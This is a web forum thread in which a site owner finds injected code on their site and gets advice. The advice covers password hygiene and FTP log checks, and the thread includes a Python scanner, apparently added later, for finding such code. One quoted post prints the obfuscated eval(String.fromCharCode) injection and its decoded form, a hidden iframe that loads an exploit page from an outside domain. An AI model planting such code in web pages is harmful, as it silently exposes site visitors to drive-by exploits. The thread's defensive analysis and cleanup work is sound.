I seem to have malware code hidden in a part of my site. I think it's in Java, but how do I find it, and how can I scan my host server for it?
I have removed everything from my PC. I think I have a page on the site that contains rogue code in a Java file or JS file. I need to know how to find it on the server and delete it.
Well... it's possible that you are referring to cookies set by JavaScript from ad providers or what have you, because it's impossible for Java or JavaScript to install any real spyware/malware on one's computer (aside from exploits in IE). Josh
What happens sometimes is that malware gets onto the machine some other way and then adds a malicious footer to every page served by the server. This footer may contain JS or Java. J.D.
OK guys, update: it seems my site was hacked. This is what I found on another forum after I found the code on the page on my site:

:: Author: Webmaster (---.dip.t-dialin.net) Date: 01-17-05 00:50

Virus confirmed...here is what I found out: They use a Javascript menu from www. apycom. com on http:// www. www. southeastacademy. org/ index.html and along with the menu code comes this line:

<script language=javascript>eval (String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116 ,101,40,34,60,105, 102,114,97,109,101,32,98,111,114,100,101,114,61, 48,32,119,105,100,116 ,104,61,48,32,104,101,105, 103,104,116,61,48,32,115,116,121,108,101,61,39 , 100,105,115,112,108,97,121,58,110,111,110,101,39 ,32,115,114,99,61,39, 104,116,116,112,58,47,47,118,120,105,102,114,97, 109,101,46,98,105,122, 47,97,100,118,101,114,116,115,47,48,53,47,49,46, 112,104,112,39,62,60, 47,105,102,114,97,109,101,62,34,41))</script>

The string above encodes the following Javascript code, which will be evaluated because of the eval() statement:

document.write("<iframe border=0 width=0 height=0 style='display:none' src='http: //vxiframe. biz/adverts /05 /1.php '></iframe>")

The code opens an invisible IFrame with content from this address: http: //vxiframe.biz /adverts/05/1.php

The domain vxiframe.biz has an interesting startpage (****) but the PHP file at the address above is even more interesting because it starts a Java.ByteVerify.exploit trojan :-/ Thanks for the info al, I'll inform the webmaster of the High School about the problem which is easy to fix. Marc

Now, how I was hacked I don't know, and how they got that into the head of a page I don't know, but it's worrying. I have deleted it from the page, and need to do something but I don't know what. Any ideas? sammie x
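The eval(String.fromCharCode(...)) line quoted in the post above can be located and decoded without ever running it. The sketch below is an added example, not code from the thread or from either forum: it decodes the number list as plain text, reports any iframe it finds inside, and can walk a downloaded copy of the site. The function names, the file-extension list and the example.invalid sample are assumptions made for illustration.

```python
import os
import re

# String.fromCharCode(<numbers, commas, stray whitespace>) as in the quoted line.
CHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)", re.I)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""src\s*=\s*['"]?([^'"\s>]+)""", re.I)
HIDDEN_RE = re.compile(r"""display\s*:\s*none|(?:width|height)\s*=\s*['"]?0\b""", re.I)

def decode_charcodes(arg_text):
    """Turn the numeric argument list into text without executing anything."""
    return "".join(chr(int(n)) for n in re.findall(r"\d+", arg_text) if int(n) < 0x110000)

def scan_page(html):
    """Return one finding per iframe tag hidden inside a fromCharCode blob."""
    findings = []
    for m in CHARCODE_RE.finditer(html):
        decoded = decode_charcodes(m.group(1))
        for tag in IFRAME_RE.findall(decoded):
            src = SRC_RE.search(tag)
            findings.append({"offset": m.start(), "decoded": decoded,
                             "iframe_src": src.group(1) if src else None,
                             "hidden": bool(HIDDEN_RE.search(tag))})
    return findings

def scan_tree(root, exts=(".html", ".htm", ".js", ".php")):
    """Walk a local copy of the site and map file path -> findings."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_page(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed sample (placeholder domain), same shape as the quoted injection.
PAYLOAD = ('document.write("<iframe border=0 width=0 height=0 '
           "style='display:none' src='http://example.invalid/1.php'></iframe>\")")
SAMPLE_PAGE = ("<html><head><script language=javascript>eval (String.fromCharCode("
               + " ,".join(str(ord(c)) for c in PAYLOAD)
               + "))</script></head><body>menu</body></html>")

if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE):
        print("hidden" if f["hidden"] else "visible", "iframe ->", f["iframe_src"])
```

Run scan_tree against a copy of the site pulled down from the host; it only reports fromCharCode blobs that decode to an iframe, so other forms of injected script need their own checks.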
Pick a phrase instead of a word and *always* use mixed letter case. If you can throw in some punctuation, it will help as well. This way you won't have to remember auto-generated passwords. J.D.
Yes. Scramble it as much as you can. MyP455WoRd&M0R3 or choose a word like 'fish' but then go with keyboard letter to the left so you get 'duag'. I even once worked out the keyboard as if it was abcdefg instead of qwerty. You can scramble an easy to remember word with a fairly easy to remember cypher like that and it will be damn hard to crack.
OK, and I just changed all my pws 2 weeks ago. Hmmm, that's about the same time as I think this was done, because I lost 1/2 of my hits about then too.
Go through your FTP logs to see if anybody tried a few passwords before they got in. Usually, a dictionary attack will result in the affected FTP log files being much larger than others - look first at those that are much bigger than the rest. Make sure you *never* browse the web when logged onto your server (that is if you are using some remote desktop software, like VNC). Depending on what you are using to connect to your server, you may have allowed some malware from your desktop to get into the server while you were connected. Another possibility is that some spyware monitors what you type and simply transferred your FTP passwords to the bad guys. J.D.
OK, I think I need to look much more into this. That page that was targeted is the most used page on the whole site; it's used about 200% more than the next page. So I think it was a hacker and put that to sell his ads on. PW change coming soon, brb, and thanx guys for all your help. sammie xox